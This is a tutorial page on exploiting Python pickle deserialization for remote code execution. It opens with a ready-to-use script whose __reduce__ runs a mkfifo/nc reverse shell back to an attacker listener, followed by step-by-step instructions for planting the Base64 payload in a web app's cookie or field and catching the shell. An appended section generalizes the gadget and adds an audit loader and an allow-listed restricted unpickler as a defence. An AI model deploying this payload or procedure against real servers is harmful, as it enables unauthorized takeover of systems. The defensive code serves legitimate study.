Python Pickle RCE

Python's "pickle" module serializes and deserializes Python objects. Unpickling is not a passive data format: the stream can tell the loader to import a callable and call it, so any application that unpickles attacker-controlled data is exposed to remote code execution. If a website accepts pickled input (for example in a cookie, a form field or an upload), we may be able to execute arbitrary code on the server.
Reference: https://davidhamann.de/2020/04/05/exploiting-python-pickle/
Date: 2023-08-10


Exploitation

Below is a Python script (mypickle.py) that generates a reverse-shell payload. It works because pickle honours `__reduce__`: whatever callable and arguments that method returns are called by the unpickler on the target, so here `os.system(cmd)` runs as soon as the web application loads our data.

import pickle
import base64
import os

class RCE:
    # On load, pickle calls the callable returned by __reduce__ with the
    # given arguments, so the target runs os.system(cmd).
    def __reduce__(self):
        # Reverse shell through a named pipe; replace 10.0.0.1 4444 with
        # the address and port of your listener.
        cmd = ('rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.0.0.1 4444 > /tmp/f')
        return os.system, (cmd,)

if __name__ == '__main__':
    pickled = pickle.dumps(RCE())
    # .decode() prints the bare Base64 text instead of a b'...' bytes repr
    print(base64.b64encode(pickled).decode())
    # or, when the value travels in a URL or cookie (no '+' or '/')
    print(base64.urlsafe_b64encode(pickled).decode())

Now run this script to generate the Base64 payload.

python3 mypickle.py

Copy the output Base64 string and paste it into the place where the website consumes the pickled value (the vulnerable cookie, parameter or field).
Before reloading the web page, start a listener on the attacking machine.

nc -lvnp 4444

Then reload the page. When the server unpickles the value, the reverse shell connects back and we get a shell in the listener's terminal.
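The following added example is not part of the original page; it generalizes the script above and adds the checks a practitioner wants around it. `Gadget` is the page's `RCE` class with the callable and arguments made parameters, so the same builder produces a page-style `os.system` payload (with a harmless placeholder command `id`, an assumption for this demo), or a `subprocess.check_output` gadget whose returned output proves that unpickling really spawned a process. `referenced_globals` reads which `module.name` pairs a payload imports without running it, and `RestrictedUnpickler` is the standard defensive pattern (an allow-listed `find_class`) that refuses such payloads. Note the caveat visible in the audit output: the payload stores the real module of `os.system`, which is `posix` on Linux and `nt` on Windows, so a payload must be generated on the same platform family as the target, quite apart from the `/bin/sh` reverse shell being Linux-only.

```python
import base64
import builtins
import io
import os
import pickle
import subprocess
import sys


class Gadget:
    """Generalised form of the page's RCE class: pickle.loads calls the
    (callable, args) pair returned by __reduce__ on the receiving side."""

    def __init__(self, func, args):
        self.func = func
        self.args = tuple(args)

    def __reduce__(self):
        return self.func, self.args


def build_payload(func, args):
    """Serialise the gadget and base64-encode it, as the page's script does."""
    return base64.b64encode(pickle.dumps(Gadget(func, args))).decode()


def page_style_payload():
    """Same shape as the page's payload (os.system + shell command). Built only,
    never loaded here; 'id' is a harmless placeholder for the reverse shell."""
    return build_payload(os.system, ("id",))


def benign_payload():
    """Constructed sample of data a web app might legitimately pickle."""
    return base64.b64encode(pickle.dumps({"user": "alice", "roles": ["admin"]})).decode()


def demo_execution():
    """Prove that loading a gadget runs a process: check_output returns the
    child's stdout, so the evidence is a string rather than a reverse shell."""
    payload = build_payload(
        subprocess.check_output,
        ([sys.executable, "-c", "print('pickle ran this')"],),
    )
    return pickle.loads(base64.b64decode(payload)).decode().strip()


class _AuditUnpickler(pickle.Unpickler):
    """Records every global the stream imports and substitutes an inert stub,
    so a payload can be inspected without executing its callable."""

    def __init__(self, data):
        super().__init__(io.BytesIO(data))
        self.seen = []

    def find_class(self, module, name):
        self.seen.append((module, name))
        return lambda *args, **kwargs: None  # stub, never the real callable


def referenced_globals(b64_payload):
    """(module, name) pairs the payload imports, e.g. ('posix', 'system')."""
    unpickler = _AuditUnpickler(base64.b64decode(b64_payload))
    try:
        unpickler.load()
    except Exception:  # stubs may break later opcodes; the audit list is kept
        pass
    return unpickler.seen


SAFE_BUILTINS = {"dict", "list", "set", "frozenset", "tuple", "str", "int",
                 "float", "bool", "bytes"}


class RestrictedUnpickler(pickle.Unpickler):
    """Defensive loader: only allow-listed builtins may be imported, so a
    gadget pointing at os.system or subprocess.* is refused before REDUCE."""

    def find_class(self, module, name):
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is forbidden")


def restricted_loads(b64_payload):
    return RestrictedUnpickler(io.BytesIO(base64.b64decode(b64_payload))).load()


def is_rejected(b64_payload):
    """True if the restricted loader refuses the payload."""
    try:
        restricted_loads(b64_payload)
    except pickle.UnpicklingError:
        return True
    return False


if __name__ == "__main__":
    print("page-style payload imports:", referenced_globals(page_style_payload()))
    print("gadget output:", demo_execution())
    print("restricted loader rejects gadget:", is_rejected(page_style_payload()))
```

Running the script prints the import the page's payload depends on, the captured output of the `check_output` gadget, and `True` for the restricted loader. The allow-list approach is the only robust fix on the defensive side; a signature (HMAC) over the pickled bytes is the alternative when arbitrary objects must be supported, but then the key must stay secret.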